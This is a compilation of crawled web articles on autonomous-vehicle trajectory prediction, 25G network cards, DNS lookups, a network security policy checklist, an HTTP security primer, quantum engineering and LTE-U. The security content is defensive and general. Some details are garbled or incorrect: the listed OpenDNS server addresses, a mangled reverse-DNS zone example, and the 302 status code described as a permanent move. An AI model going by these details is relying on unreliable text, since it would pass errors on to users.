12 Nov Using Behavioral Prediction in Autonomous Vehicles
Over the next decade autonomous vehicles (AV) are expected to reduce the number of road accidents and to improve overall road safety. Behavioral prediction plays a key role in efficient decision making and enables risk assessment in AV applications. For example, while driving on a two-lane road you are intending to go left and another car in the second lane is coming from the opposite direction. How will that vehicle behave? Will it continue straight? Will it make a turn? Prediction in autonomous vehicles means predicting the trajectory or path of the other vehicle and deciding on an appropriate action to avoid collision.
Road geometry and traffic rules can completely change the behavior of vehicles. For instance, the behavior of vehicles approaching a four-way ‘STOP’ sign can change instantly. A model trained in a static driving environment– without considering traffic rules and road geometry–would prove limited value within other driving environments. Accurate prediction of vehicle behavior requires a multimodal approach. Multimodal means that more than one possible future action exists given the history of motion of a vehicle. For example, when a vehicle is approaching a ‘STOP’ sign without a turn-signal indicator, it can either go straight or make a turn.
Building an AV Prediction Model
To understand its environment and the dynamics and future behaviors of surrounding objects, the AV model requires data input. The typical inputs for AV prediction comes from sensor fusion and localization. Sensor fusion data is generated by using a Kalman Filter to combine inputs from multiple sensors (radar, LIDAR, etc.).
Bird’s-Eye View (BEV) rasterization is a common choice as the system’s input when working with AV data. BEV consists of top-down views of a scene. Building models using BEV simplifies the prediction process because the coordinate spaces of the input and output are the same. Infrastructure sensors can provide a non-occluded top-down view of the environment.
A self-driving system is a multi-agent environment. A deep supervised learning approach can address the multiagent environment by accurately capturing rare and unexpected behaviors on the road. Within the AV stack, the three tasks involved in building a self-driving system could be defined as follows:
- Perception (identifying objects around the AV)
- Prediction (determining appropriate next steps)
- Planning (deciding future AV behaviors)
Focusing on prediction, one can build a model to provide the AV with critical data related to potential future behaviors. Research has shown that among deep learning-based models, complex models e.g., Multiple RNNs or Resnet or Combination of RNNs and CNNs achieve better performance compared to simple models like single RNN.
Predicting multimodal trajectory instead of unimodal trajectory might not always result in lower RMSE but can achieve better performance. For example, the models named GRIP and ST-LSTM achieved better performance compared to M-LSTM and CS-LSTM since GRP and ST-LSTM dealt with multimodal trajectories. Higher RMSE could be the result of limited model capacity and/or limited data used in training of multimodal trajectory prediction models.
Improving AV Prediction Models:
There are several mechanisms that can be employed to improve the overall performance of AV prediction models. Those would include the following:
- Training speed: Increasing the dimensions of the first and last layer of the deep network improves speed and use of lighter EfficientNet instead of ResNet improves model performance.
- Performance: Adding agent history to the prediction model can improve prediction accuracy and reliability.
- Uncertainty capture: Multimodal prediction is preferred when one trajectory per agent is not enough to capture and analyze various situational uncertainties.
Evaluation metrics in AV prediction depends on how many factors are being predicted. Typical factors involved in vehicle behavior prediction include: accuracy, precision, recall, F1 score, and negative likelihood. Trajectory prediction evaluation metrics include FDE (Final displacement error), MAE (Mean absolute error), RMSE (Root Mean Square Error), Minimum of K metric, and cross entropy.
Deep learning solutions have shown promising performance for trajectory and behavior prediction in complex driving scenarios. Most existing solutions only consider the interaction among vehicles. These solutions provide a very narrow assessment of potential behaviors. Models that incorporate traffic rules, road geometry, environment conditions and other variables produce predictive analysis that is much deeper and broader.
Vehicle behavior prediction is a complex process. There are still many challenges that can only be met via utilization of next-generation technologies and applications. | <urn:uuid:32834044-d370-4b36-8a09-96c94e19bb73> | CC-MAIN-2022-40 | https://www.micro.ai/blog/using-behavioral-prediction-in-autonomous-vehicles | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00202.warc.gz | en | 0.900238 | 969 | 3.34375 | 3 |
25G NIC - the Highly Effective Path Towards 100G Network
25G and 40G are competing with each other during the upgrading from 10G to 100G in data centers. Increasingly more people are in favor of 25GbE joined by the endorsement of 25G by large cloud providers such as Google and Microsoft, it seems that 25G will finally surpass 40G as the most deployed server with great access speed. Therefore, 25G products keep popping up in the market. One key component in the entire 25G/100G structure is the 25G NIC. This post will shed light on the little flat card.
What Is 25G NIC?
Network interface card (NIC), also known as the server adapter, is a printed circuit board that provides network communication capabilities to and from a personal computer. It is usually a separate adapter card that can be inserted into one of the server’s motherboard expansion slots. This device works at the physical layer and the data link layer and has a unique physical network address, also referred to as a MAC address. The side plate of the NIC is usually built with an interface. Some server NICs have two or more network interfaces built into a single card like the below one. As is known to all, 40Gb is now at the transition period. However, the bandwidth of a 40G network card is too large for the server, and the cost is also relatively high. 25G NIC is exactly what we need at this moment in time.
Why Do We Need 25G NIC?
The trend to 25G Ethernet networking is backed by the impressive performance and the cost of 25G Ethernet networking technology. The popularity of 25G server connectivity drives the robust demand for 25G NIC. 25G technology allows more bits to pass through a single strand of copper/fiber cabling. That is to say, 100G migration can be realized by 4 strands of 25G, saving a lot of space and materials compared with 10 strands of cable when used with legacy 10G technology. Besides, it is predicted that 25G Ethernet leaf switch ports should have a less than 10% premium over 10G, while reaching the crossing point in 2019.
25G NIC Facilitate 25G ToR Switch to 25G Server Connection
25G NIC greatly boosts the 10G-25G-100G or 10G-25G-50G-100G server connections, making it more cost-effective than the current Ethernet speed upgrade model 10G-40G-100G. When deploying 25G Ethernet network, ToR switching architecture is often applied.
In a ToR configuration, 25G ToR switches are placed in the top of each cabinet, connecting directly to the 25G servers in the cabinet via point-to-point cabling. 25G NICs are used in each 25G server. All 25GbE servers can be connected to 25GbE switch ports via 25G DAC/AOC cables or 25G SR transceiver and fiber patch cables. FS 25G NIC also delivers excellent performance for 25GbE connectivity that is backwards compatible with 1/10GbE, making the migration to a higher speed easier.
How to Choose 25G NIC?
The NIC in a server computer connects many network users to the server. For a heavily used server, it is worth investing more on a higher-quality NIC. Some name-brand manufacturers such as Mellanox, Dell, HPE, Intel, SMC, 3Com as well as FS.COM are competing in this field. Here are some points to consider when choosing an appropriate 25G NIC.
Interfaces or outlets on the card are used to connect the communication media. They accept SFP28 fiber optic transceivers or SFP28 DAC cables for 25G connections. There are 1-port, 2-port, 4-port and even 6-port 25G NICs in the market. These multiple ports are used to access diverse networks, storage, management and so on. Choose the right 25G NIC with certain ports according to your applications.
The interface that the card connects to is also a critical consideration. PCIe (Peripheral Component Interconnect Express) is the recommended interface solution for 25G server adapters as it is a faster solution when compared to ISA (Industry Standard Architecture). However, there are various versions of PCIe, such as PCIe 1.0, PCIe 2.0, PCIe 3.0, PCIe 4.0, among which PCIe3.0 x8 is the popular interface version in 25G NICs from varied manufacturers. It is stated that the number after the x indicates the physical size of the PCIe card or slot, with x16 being the largest and x1 being the smallest. While the number after PCIe is indicating the latest version number of the PCI Express specification that’s supported. PCIe 3.0 is amazingly fast compared to PCIe 1.0 and PCIe 2.0, as it can support a bandwidth of 7.877 Gbit/s per lane (984.625 MB/s). To capitalize on PCIe3.0 x8, your motherboard should support PCIe 3.0 and have a free PCIe x8 slot. So take into consideration the hardware you own or intend to buy before you make decisions.
To fully realize the server adapter function, the card chip is crucial, for the quality of it determines the stability and speed of the card. Large manufacturers choose Intel chipset, which can provide a reliable guarantee for high quality, high stability and high compatibility of NICs. FS PCI Express x8 Dual Port SFP28 25G server adapter is based on Intel XXV710® chipset, compatible with PCIe x16 slot. The server adapter can meet the demand of next-generation data centers by providing unmatched features for both server and network virtualization. By also providing reliable performance in a flexible LAN and SAN networks.
With 2.5X faster performance, 100% better performance-per-dollar, backward compatibility plus a future-proof upgrade path to 100G, the new 25G systems deliver best-in-class TCO for today's agile data centers. The majority of server vendors are offering 25 Gigabit Ethernet NICs as the standard I/O option in their latest 2-socket and 4-socket servers. FS is ready to embrace the 25G/100G technology with a series of 25G products ranging from optical transceivers, network switches to fiber optic cassettes. | <urn:uuid:f7cb3ddb-88af-4598-a786-789f53c4999d> | CC-MAIN-2022-40 | https://community.fs.com/blog/25g-nic-path-towards-100g-network.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00202.warc.gz | en | 0.923405 | 1,325 | 2.53125 | 3 |
Subnet Mask Cheat SheetRecords Cheat SheetGeoDNS ExplainedFree Network TroubleshooterKnowledge BasePricing CalculatorLive CDN PerformanceVideo Demos
BlogsNewsPress ReleasesIT NewsTutorials
Give us your email and we'll send you the good stuff.
Tanya Valdez is a Technical Writer at Constellix. She makes the information-transfer material digestible through her own transfer of information to our customers and readers. Connect with her on LinkedIn.
Domain name system (DNS) lookups are how end users obtain the websites they search for. It is the way DNS services resolve end-user queries and acquire information related to domains.
A DNS lookup is initiated when an end user enters a domain name and the resolver translates it into the corresponding identifier—the IP address. To understand this process, it is best to start with the basics of DNS—what it is, how it works, and what a query journey looks like. For a detailed explanation, visit our What is DNS resource page.
A query journey includes all of the steps taken to translate the entered domain name to an IP address. When a person enters a web address into their browser, the search is initiated. The query first stops at the recursive server which contacts a series of authoritative servers to gain all of the information that it needs to translate it into language that a machine can read. Then, it returns the IP address related to the domain that was initially searched. There are instances in which the path may change or the domain is unreachable, but as a whole, that is the road most taken in query journeys.
For all of this to take place, the proper path needs to be established. In comes DNS records. DNS records set the rules and lay down the paths for the query to travel. They store all of the relevant information servers need to properly translate email addresses and domain names into meaningful numerical addresses to complete the DNS process.
There are two different types of DNS lookups: forward DNS and reverse DNS lookups.
Forward DNS (also known as a forward DNS lookup) is a request that is used to obtain an IP address by searching the domain. This follows the standard DNS query journey when the user types in a web page or sends an email and is provided with the related IP address.
This process allows an end client to translate a domain name or email address into the address of the device that would handle the server-side communication.
Reverse DNS is the exact opposite of forward DNS. It is a lookup request that is used to obtain the domain name related to an IP address. Reverse lookups are typically used by email servers to ensure that the servers they are receiving messages from are valid.
To complete this process, the mail server must have a pointer (PTR) record established. This type of record informs other mail servers that its IP address is authoritative for sending and receiving mail for its related domain.
The IP owner (typically the ISP or hosting provider for the particular email server) delegates a zone for the server that ends in “in-addr.arpa” with some preceding numbers. The numbers at the beginning of the zone are the server’s IP block with the octets reversed.
Example: The reverse DNS for the 192.168.1 class C would be “1.168.192.in-addr.arpa”. In this example, this reverse DNS zone would handle the reverse DNS for IPs 192.168.1.0 to 192.168.1.255. If the IP block is smaller than a class C, the zone might be “27/1.168.192.in-addr.arpa” or “0-184.108.40.206.in-addr.arpa”. The difference is the syntax.
For more information on reverse DNS, see our set-up tutorial.
DNS information related to a domain can be found by using DNS lookup commands. They can provide details such as nameservers, mail servers, and configured records.
A nameserver lookup, also known as an nslookup, allows you to locate the nameserver associated with a domain, along with any configured records. This information can be resolved using an IP address or a domain name as the search option. The command for an nslookup differs slightly across PC, Mac, and Linux. Using Windows 10, this is done through the command prompt and a Mac device uses the terminal. Linux users utilize dig, which is also a command line utility that allows users to locate domain information.
For a detailed look at how to run an nslookup, see our ….. resource.
While there are a few online tools that assist in retrieving DNS information, Constellix’s DNS Lookup Tool allows you to perform a search from any device, including cell phones and tablets. The lookup results can be shared and this has proven to be very useful for teams in troubleshooting domain configuration changes.
DNS lookups utilize DNS records to translate IP addresses and domain names or email addresses. There are two types of lookups: forward DNS and reverse DNS. Both resolve information related to the domain, depending on the search method. If you have a domain name or email address and need the IP address resolved, forward DNS is used to return the requested information. It is a functional part of all IP-based networks, including the internet. If you have an IP address and need to locate an email address or domain name, reverse DNS resolves this request.
Here are some related DNS resources:
Sign up for news and offers from Constellix and DNS Made Easy | <urn:uuid:0a7c39ae-6aa5-4750-8e89-a5dfbcfe1183> | CC-MAIN-2022-40 | https://constellix.com/news/how-does-dns-lookup-work | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00202.warc.gz | en | 0.909389 | 1,196 | 3.21875 | 3 |
If you care at all about your business’s security, you should at least have an overview idea of these 3 fundamentals: network security, desktop security and a security policy.
There are two overriding principles in security design:
1) The overall level of security protection is only as good as the lowest common denominator, as attackers will always find the weakest link.
2) Complexity is the enemy of security.
Security Policies defines the simplest, lowest common denominator necessary to meet business security goals. In order to accomplish this objective the following topics must be considered.
• Virus Protection
• System Penetration
• External hacking
• Theft of proprietary information
• Theft of transaction information
• Financial fraud
• Unauthorized insider access
• Denial of service (DoS)
• Web site vandalism
• Internal hacking
• Physical break-in and/or theft of computer equipment
With that, I would like to present, certainly not the end all, but at least the fundamental elements of what an organization should consider to have in place if there are even to have a prayer to address the above. So, submitted for your approval, we would like to share the elements of:
• A SECURITY POLICY
• NETWORK SECURITY
• DESKTOP SECURITY
• The security policy is not displayed on the Internet but is used to direct and guide development of web sites in order to create a safe user environment.
• For all transmissions between clients (i.e. web browser) to web server through the Internet containing ‘sensitive’ data use a Secured Sockets Layer (SSL) connection.
• For all transmissions between the web server (i.e. IIS) and the database containing ‘sensitive’ data use approved encryption.
• For the storage (i.e. persistence) of ‘sensitive’ data within Database Management Systems (e.g. Microsoft SQL Server) use approved encryption unless otherwise instructed.
• For the storage (i.e. persistence) of Microsoft OS level files use Microsoft security guidelines / best practices (e.g. on NT servers running IIS use NTFS not FAT). Always set file access privileges within NTFS and IIS to ensure optimal security (optimal is defined as allowing access to only users and applications that are authorized and entitled), unless otherwise instructed.
• For all transmissions containing ‘sensitive’ data between the web server and other servers within local control use approved encryption unless otherwise instructed.
• For user login authentication use the secure authentication mechanisms, e.g., two factor, certificate, or credentialed mechanisms.
• Monitor the availability of security related patches and updates to products that pose security risk (e.g. IIS patches to security related ‘holes’), and apply in an expeditious manner.
• Avoid use of system default values (out of box settings) within publicly available software, absolute path names to files, and sample code that encourage breaches in security.
• Check Computer Emergency Response Team (CERT) (www.cert.org) and System Administration, Networking, and Security (SANS) Institute (www.sans.org) security web sites on a prescribed basis for warnings, announcements, and updates as they become available.
• Perform regular frequent system backups.
• Implement strict review, testing, change control and documentation processes as defined by your organization. These processes should surround all changes (e.g., home grown CGI scripts may inadvertently open a door to an intruder).
Physical Connection and Web Servers
• When ‘sensitive’ information is passed between the users on the Internet and the web server use an SSL connection. Encrypt all web pages that display user-specific and financial information using 128-bit SSL. Use built-in browser SSL features and server-side SSL certificates provided by the hosting facility.
• Web servers, database servers and application servers must be physically located only at secure hosting facilities compliant to organizational standards.
• Files passed between web servers and the organization will be through private lines between and the hosting facility.
• Use of firewalls (and a DMZ?) is required to isolate commerce servers from other merchant networks and systems.
• Incorporate the organization approved fraud detection metrics on web server (assuming credit card usage).
Database Encryption for Sensitive Data
• ‘Sensitive’ information will be encrypted in the database.
• Use an organization-authorized third-party encryption component to encrypt and decrypt all ‘sensitive’ data fields in the organization business databases.
• Use stored procedures for accessing data in the database, and ensure that access permissions are correct. Only applications that have proper Windows authentication permissions are entitled to run stored procedures and have access to the Relational Database Management System servers.
• Store ‘sensitive’ information like credit card numbers on back-end machines that are better protected than the commerce servers.
• When sending email confirmation of orders, indications of shipping status, etc. mask all confidential information like credit card numbers (to prevent unauthorized use).
• Use of basic entitlement mechanisms for company directory access to ensure the user being properly authenticated. Redirect users that are not authenticated to the login.
• After login authentication require Web users to authenticate themselves by entering additional personal information as directed by the organization. For example the organization finance project users must enter their Account Number and SSN to access their account information).
• Users will only be shown account information for which they’ve provided adequate authentication. Also, the application will enforce business rules on various levels of account access based on the account status.
• COM components must use Microsoft operating system (e.g. NT / Windows 2000) authentication facilities along with proper permissions and rules.
Firewall and Router screening
Ensure that firewall/router screening is in place to restrict access to only necessary services, e.g., HTTP, SSL.
An intrusion detection policy can help find those attackers that are able to subvert the web server. This policy will help Honda’s Legal Department in prosecuting these attackers.
• Ensure that mechanisms are in place to identify apparent unusual accesses to the systems
• Provide alerts to the administrator in the case of unusual accesses to the systems.
IP reputation is a new service that enable the filtering of messages based on the sending server’s IP address. The type of messages sent from that IP address are tracked and stored so your perimeter firewall knows if the sending server is a likely source of spam. There are three functions of IP reputation: Blacklist, Graylist, and Whitelist
ISP Reviews and Audits
ISPs must cooperate with Honda’s independent reviewers (Internal and external auditors, risk assessors, etc.). If this is not possible the ISP must provide a recent SAS70 evaluation to the organization and a contract to have ISP’s agree to share any economic loss from a security breach is required.
Find a program that examines .exe, .dll, and .ocx files on your computer and matches the data against a file signatures engine to determine whether you are running unpatched software programs. It then provides help in patching the vulnerabilities that are identified. Example link: https://psi.secunia.com/
No software to install. Just change your DNS settings to use OpenDNS servers (188.8.131.52 and 184.108.40.206) to get valuable security features—content filtering, adult site blocking, phishing and malware blocking, and protection against DNS rebinding attacks. Example link: http://www.opendns.com
The free browser plugin (Internet Explorer and Firefox) covers the growing data security hole between your firewall and anti-virus programs. It provides an aggressive, color-coded early warning system for drive-by malware attacks. Example link: http://www.hautesecure.com
A program is needed to intelligently monitor Windows machines for remote botnet C&C (command and control) commands. These can include commands to turn the zombie machine into a spam relay; launch denial-of-service attacks; or host malicious Web sites for phishing attacks. Example link: http://www.trendsecure.com/portal/en-US/tools/security_tools/rubotted
A program that detects and removes stealthy rootkits used by hackers to hide malicious software from security programs. Example link: http://free.grisoft.com/doc/39798/us/frt/0
Network security isn’t something you can cover in one sitting but hopefully this can guide you in the right way. At Affant Network Services, we are constantly looking to keep you up to date with the latest security tips and tricks. To learn more about this topic or to see how you can get started contact us today at 714.338.7100.
Founding and leading technology-oriented service organizations since 1988. Specializes in Public speaking relating to Business Management, Entrepreneurship, Communication Network Management, Network Security, Managing your Team, and IP Telephony /VoIP / IP Communication. | <urn:uuid:ddb03a9f-ef8d-4515-81a8-9dbfb3ea6742> | CC-MAIN-2022-40 | https://affant.com/the-hitchhikers-guide-to-network-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00202.warc.gz | en | 0.868131 | 1,961 | 2.53125 | 3 |
Quantum Engineering Required to Overcome Challenges to Make Quantum Computing a Reality
(MIT.edu) Quantum systems are not easy to manage, thanks to two related challenges. Both science and engineering will be required to overcome these challenges to make quantum computing a reality.
The first problem is that a qubit’s superposition state is highly sensitive, The second challenge lies in controlling the qubit to perform logical functions, often achieved through a finely tuned pulse of electromagnetic radiation.
William Oliver is an associate professor in MIT’s Department of Electrical Engineering and Computer Science, a Lincoln Laboratory Fellow, and the director of the MIT Center for Quantum Engineering. The computers Oliver engineers use qubits composed of superconducting aluminum circuits chilled close to absolute zero. The system acts as an anharmonic oscillator with two energy states, corresponding to 0 and 1, as current flows through the circuit one way or the other. These superconducting qubits are relatively large, about one tenth of a millimeter along each edge.
Oliver is constantly fighting decoherence, seeking new ways to protect the qubits from environmental noise. His research mission is to iron out these technological kinks that could enable the fabrication of reliable superconducting quantum computers. “I like to do fundamental research, but I like to do it in a way that’s practical and scalable,” Oliver says. “Quantum engineering bridges quantum science and conventional engineering and both will be required to make quantum computing a reality.”
Another solution to the challenge of manipulating qubits while protecting them against decoherence is a trapped ion quantum computer, which uses individual atoms — and their natural quantum mechanical behavior — as qubits. Atoms make for simpler qubits than supercooled circuits, according to John Chiaverini, a researcher at the MIT Lincoln Laboratory’s Quantum Information and Integrated Nanosystems Group. “Luckily, I don’t have to engineer the qubits themselves,” he says. “Nature gives me these really nice qubits. But the key is engineering the system and getting ahold of those things.”
Chiaverini notes that the engineering challenges facing trapped ion quantum computers generally relate to qubit control rather than preventing decoherence.
Oliver and Chiaverini agree that quantum information processing will hit the commercial market only gradually in the coming years and decades as the science and engineering advance.
“Quantum computing has been the future for several years,” Chiaverini says. But now the technology appears to be reaching an inflection point, shifting from solely a scientific problem to a joint science and engineering one — “quantum engineering” — a shift aided in part by Chiaverini, Oliver, and dozens of other researchers at MIT’s Center for Quantum Engineering (CQE) and elsewhere. | <urn:uuid:b3d39751-6a88-4143-820f-77a1441d3b9e> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-engineering-required-to-overcome-challenges-to-make-quantum-computing-a-reality/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00202.warc.gz | en | 0.912805 | 592 | 3.390625 | 3 |
HTTP is a ubiquitous protocol and is one of the cornerstones of the web. If you are a newcomer to web application security, a sound knowledge of the HTTP protocol will make your life easier when interpreting findings by automated security tools, and it’s a necessity if you want to take such findings further with manual testing. What follows is a web security-focused introduction to the HTTP protocol to help you get started.
HTTP is a message-based (request, response), stateless protocol comprised of headers (key-value pairs) and an optional body. Three versions of HTTP have been released so far – HTTP/1.0 (released in 1996, rare usage), HTTP/1.1 (released in 1997, wide usage), and HTTP/2 (released in 2015, increasing usage).
The HTTP protocol works over the Transmission Control Protocol (TCP). TCP is one of the core protocols within the Internet protocol suite and it provides a reliable, ordered, and error-checked delivery of a stream of data, making it ideal for HTTP. The default port for HTTP is 80, or 443 if you’re using HTTPS (an extension of HTTP over TLS).
HTTP is a line-based protocol, meaning that each header is represented on its own line, with each line ending in a Carriage Return Line Feed (CRLF) with a blank line separating the head from the optional body of the request or response.
Up to HTTP/1.1, HTTP was a text-based protocol, however, with HTTP/2 this has changed. HTTP/2, unlike its predecessors, is a binary protocol with most implementations requiring TLS encryption. It’s worth noting that for the vast majority of cases (and certainly, for this article) interacting with the HTTP/2 protocol won’t be any different. It’s also worth mentioning that HTTP/1.1 isn’t going away anytime soon, and it’s still early days for HTTP/2 (as such, HTTP/1.1 will be referenced throughout this article) even though it is supported by all major web servers such as Apache and NGINX, as well as modern browsers such as Google Chrome, Firefox, and Internet Explorer.
In order to initiate an HTTP request, a client first establishes a TCP connection to a specified web server on a specified port (80 or 443 by default).
The request would start with an initial line known as a request line, which contains a method (GET in the following example, more on this later), a URL (/, indicating the root of the host in the below example) and the HTTP version (HTTP/1.1 in the below example). We must also include a
Host header in order to tell the HTTP client where to send this request.
GET / HTTP/1.1 Host: www.example.com
The above is exactly what a web browser does when you type in http://www.example.com into its URL bar. If we wanted to get the contents of http://www.example.com/about.html, we would send the following request instead:
GET /about.html HTTP/1.1 Host: www.example.com
HTTP Request Methods
The HTTP protocol defines a number of HTTP request methods (sometimes also referred to as verbs), which are used within HTTP requests to indicate to the server the desired action for a particular resource.
|GET||The GET method is used to retrieve a resource from a server.|
|POST||The POST method is used to submit data to a resource.|
|TRACE||The TRACE method is used to echo back anything sent by the client. This HTTP method is typically abused for reflected Cross-site Scripting attacks.|
|PATCH||The PATCH method is used to apply partial updates to a resource.|
|PUT||The PUT method is used to replace a resource.|
|HEAD||The HEAD method is used to retrieve a resource identical to that of a GET request, but without the response body.|
|DELETE||The DELETE method is used to delete the specified resource.|
|OPTIONS||The OPTIONS method is used to describe the supported HTTP methods for a resource.|
|CONNECT||The CONNECT method is used to establish a tunnel to the server specified by the target resource (used by HTTP proxies and HTTPS).|
On the server-side, an HTTP server listening on port 80 sends back an HTTP response to the client for what it has requested.
The HTTP response will contain a status line as the first line in the response, followed by the response. The status line indicates the version of the protocol, the status code (200 in the below example), and, usually, a description of that status code.
Additionally, the server’s HTTP response will typically also include response headers (
Content-Type in the below example) as well as an optional body (with a blank line at the end of the head of the request).
HTTP/1.1 200 OK Content-Type: text/html <html> ... </html>
Response Status Codes
HTTP response status codes are issued by the server within an HTTP response to let the client know what the status of the request is. Status codes are organized in the following categories.
|Status code group||Description|
Some of the most relevant HTTP status codes for web application security testing are the following, however, a full list of status codes and their descriptions may be found here.
|Status code group||Description|
|200 OK||Indicates that the request has succeeded.|
|301 Moved Permanently||Indicates that the resource requested has been permanently moved to the URL within the
|302 Found (Temporary Redirect)||Indicates that the resource requested has been permanently moved to the URL within the
|400 Bad Request||Indicates that the server could not understand the request sent by the client, usually due to invalid syntax.|
|401 Unauthorized||Indicates that the request could not be served due to insufficient authentication.|
|403 Forbidden||Indicates that the server understood the request but refuses to authorize it.|
|404 Not Found||Indicates that the server cannot find the requested resource.|
|405 Method Not Allowed||Indicates that the request method is known by the server, but it is not allowed to be used with this resource.|
|500 Internal Server Error||Indicates that the server encountered an unexpected condition that prevented it from fulfilling the request.|
The query string is defined using the question mark (
?) character after the URL within an HTTP request. The query string defines a series of key-value parameters separated by the ampersand (
GET /search?query=example&lang=en_US HTTP/1.1 Host: www.example.com
Query string parameters are one of the primary mechanisms that web applications use as user input. It’s, therefore, no surprise that most web application vulnerabilities arise from poorly handled user input within query string parameters.
URL encoding is a way to represent characters that cannot (or should not) be present within URLs to be represented safely within a URL. This allows encoding and decoding of characters that would otherwise cause problems or conflicts. The following are some examples of URL encoded characters:
Since HTTP is a stateless protocol, cookies are a built-in mechanism to pass state data to the server. Typical examples included in cookies would be state information such as session identifiers and user preferences.
Cookies are crucial to security since they are widely used to store session information. This means that if an attacker can steal a user’s cookie (using attacks such as Cross-site Scripting, for example), in many web applications, this alone provides the attacker with all they need to impersonate that user.
Cookies are set by the server using the
Set-Cookie HTTP response header. The browser then stores the cookie value and submits it with every request. This may also introduce vulnerabilities such as Cross-site Request Forgery. The cookie value may contain several values delimited by a semicolon (
Additional security features around cookies include
The HTTP protocol includes two types of built-in authentication mechanisms: Basic and Digest. While these two methods are built-in to HTTP, they are by no means the only authentication methods that can leverage HTTP, including NTLM, IWA (Integrated Windows Authentication, also known as Kerberos) and TLS client certificates. Additionally, form authentication, OAuth/OAuth2, SAML, JWT, and a whole host of other types of authentication options re-use features within HTTP such as form data or headers to authenticate a client.
Basic authentication is a built-in HTTP authentication method. When a client sends an HTTP request to a server that requires Basic authentication, the server will respond with a 401 HTTP response and a
WWW-Authenticate header containing the value
Basic. The client then submits a username and a password separated by a colon (
:) and base64-encoded.
It’s important to note that Basic authentication sends credentials in the clear (without any form of encryption). This means that for Basic authentication alone is not secure, is highly susceptible even to the simplest man-in-the-middle attacks, and must be paired with the use of SSL/TLS.
Digest authentication is also built-in to HTTP and similarly to Basic authentication, it also returns a 401 HTTP response and a
WWW-Authenticate header. In the case of Digest, the
WWW-Authenticate header will contain the value of digest together with a nonce (number only used once) and a realm (defines a URL path, which may share the same credentials).
The HTTP client would then concatenate the supplied credentials together with the nonce and realm and produce an MD5 hash (first hash). The HTTP client then concatenates the HTTP method and the URI and generates an MD5 hash (second hash). The HTTP client then sends an
Authorize header containing the realm, nonce, URI, and the response. The response is an MD5 sum of the two hashes combined.
While digest is a more secure alternative to Basic authentication, it is still highly advised for any authentication traffic to be transmitted over an HTTPS connection (SSL/TLS).
Form-based authentication is by far the most popular kind of authentication. It’s also not standard, in the sense that any application developer can dictate how an HTTP client should authenticate to an application.
Typically, the HTTP client would send a POST request to the server with the combination of a username and a password, after which, if successful, the server will respond with some kind of token. This token could be placed in a
Set-Cookie HTTP header, which would set a cookie in the browser (meaning that this value will henceforth be passed with each request to the server).
Such POST requests can be made by the browser by using a
<form name="login" action="https://login.example.com" method="post"> <input name="username" type="text"> <input name="password" type="password"> <input value="Login" type="submit"> </form>
This would send data from input fields
password (field names are arbitrary) in a POST request to https://login.example.com. The POST request would be as follows:
POST / HTTP/1.1 Host: login.example.com username=myusername&password=mypassword
HTTP headers are a way for an HTTP client and server to pass additional information within requests and responses. HTTP headers consist of a case-insensitive key (may not contain spaces), followed by a colon (
:), which is in turn followed by the header’s value (may contain spaces). The header is terminated by a CRLF (carriage return and line break).
It’s worth noting that while there are a number of standard HTTP headers, the HTTP protocol allows custom headers. Typically, custom headers start with an X- (for example, the
the X-Frame-Options header, and more), however, this is simply a widely adopted convention and not something enforced by the HTTP protocol. Note that some headers were originally custom headers but now are adopted as a standard, for example,
X-Content-Security-Policy is now
The following are some examples of commonly seen HTTP headers. A complete list of standard HTTP headers may be found here.
||Used to specify directives for caching mechanisms in both requests and responses.||
||Indicates to the sender/receiver to keep the TCP connection open or close it.||
||Indicates the MIME type of the request/response body.||
||Indicates the type of encoding used for the request/response body.||
||Indicates the size in bytes of the request/response body.||
||Contains cookie values, which were set using the
||Contains the hostname of the URL being requested. This is a required header in HTTP/1.1 and it is important since the same server may serve different sites based on this header. This header is also important to keep in mind when defending against host header attacks.||
||Indicates to the server the page from which a link was clicked from. The header was misspelled in the original specification and has remained so instead of being changed to referrer.||
||Contains the authentication method together with credentials.||
||Contains a string to identify the client (browser or another tool) that is making the request.||
||Indicates to the server what content MIME type it will accept.||
||Indicates to the server what types of encoding it will accept.||
||Sets a cookie in the browser that will be later submitted.||
||Indicates the type and version of the server. This information could be useful for attackers.||
Conclusion and Further Reading
This sums-up some useful basics of the HTTP protocol that should get you up to speed with the terminology surrounding HTTP. Now that you’ve covered the basics, you should be able to understand the reports containing HTTP requests, responses, and other HTTP attributes, which means the next time you generate an Acunetix Developer Report, you should be sorted.
If you want to read more about HTTP security, we recommend you to have a look at our SSL/TLS basics series that includes the explanation of HTTPS, public keys, and SSL certificates, our article on HTTP Strict Transport Security and HSTS headers, our article about Sameorigin, as well as our article about clickjacking. You can also read the detailed description of the content security policy (CSP) HTTP security header by the Mozilla foundation.
Get the latest content on web security
in your inbox each week. | <urn:uuid:999a9d65-ef11-460b-b24b-271a519c9bc2> | CC-MAIN-2022-40 | https://www.acunetix.com/blog/web-security-zone/http-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00202.warc.gz | en | 0.875342 | 3,388 | 3.59375 | 4 |
March 17, 2017// News
Faster Cellular Signals Could Mean Slower Wi-Fi
Wireless companies will soon be transmitting data in the same part of the public airwaves that’s used by Wi-Fi. Dubbed as LTE-U, the carriers will have more spectrum to play with, which should lead to faster speeds for their customers. Those cellphone signals may interfere with Wi-Fi transmissions.
Vice President of Technology Policy at CableLabs, Rob Alderfer, commented on the move in a San Jose Mercury News article.
